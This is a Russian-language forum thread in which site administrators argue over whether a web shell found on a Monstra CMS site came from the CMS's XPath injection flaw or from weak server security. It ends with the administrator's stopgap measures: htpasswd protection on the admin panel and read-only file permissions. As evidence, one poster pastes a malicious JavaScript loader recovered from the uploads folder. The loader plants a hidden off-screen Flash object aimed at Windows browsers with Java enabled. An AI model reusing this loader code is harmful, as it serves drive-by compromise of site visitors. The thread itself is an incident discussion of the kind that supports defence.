newbie пишет:FLy пишет:сегодня обнаружил, что монстру взломали. в корне сайта папка css с правами 0777, в ней файл sys0972500-1.php с шеллом внутри. так что все проверьте свои сайты, может тоже коснулось.
ну и главное, хотелось бы увидеть патч или руководство по исправлению уязвимости.
И причём тут monstra? Это сервер у Вас фиговый.
1. Как вы через монстру сможете сделать: "в корне сайта папка css с правами 0777, в ней файл sys0972500-1.php с шеллом внутри"?
Ответ: никак.
Это вы только через админку сервера только сделайте.
на мой фиговый сервер каждый день приходится по несколько тысяч атак с брутом всяких вордпрессов, джумл и т.д. и только на сайте с монстрой, ну надо же какая случайность, появляется шелл. из-за ограничений open_basedir злоумышленник не смог выйти за пределы аккаунта этого сайта, шеллы были рассованы внутри _только_ этого аккаунта. ещё не убедил? хорошо, продолжим...
для начала, предлагаю прочитать описание уязвимости "XPath-инъекция в Monstra CMS" - http://www.securitylab.ru/vulnerability/445421.php
затем погуглите, что такое вообще XPath-инъекция.
ну и на последок самое вкусное - как, имея все необходимые данные, залить скрипт в папку /public/uploads и через него залить шелл на сайт? ответ - очень просто.
и вы серьёзно думаете, что все шеллы заливаются только через админ-панели хостингов?)
вот код скрипта, заливающего шелл, обнаруженный в папке uploads:
function addNewObject(){try{var ua=navigator.userAgent.toLowerCase();if((ua.indexOf("chrome")==-1&&ua.indexOf("win")!=-1)&&navigator.javaEnabled()){var counter="/tmp/minify/.empty.swf?r=338639035";var div=document.createElement('div');div.innerHTML='<object id="dummy" name="dummy" classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="1" height="1">';div.innerHTML+='<param name="allowScriptAccess" value="always" \/>';div.innerHTML+='<param name="movie" value="'+counter+'" \/>';div.innerHTML+='<embed id="dummy2" name="dummy2" src="'+counter+'" width="1" height="1" name="flash" allowScriptAccess="always" type="application\/x-shockwave-flash" \/>';div.innerHTML+='<\/object>';div.style.position='absolute';div.style.left='-100px';div.style.top='-100px';document.body.insertBefore(div,document.body.children[0]);}}catch(e){if(document.body==undefined||document.body.children[0]==undefined){setTimeout('addNewObject()',50);}}};addNewObject();
вот обзор на хабре - http://habrahabr.ru/post/196882/
разбираться с этим всем делом некогда, поэтому временно принял такие меры - htpasswd на вход в админку, chmod 0444 на все файлы и рекомендация всем клиентам на монстре или ждать патчей, или переходить на другую cms.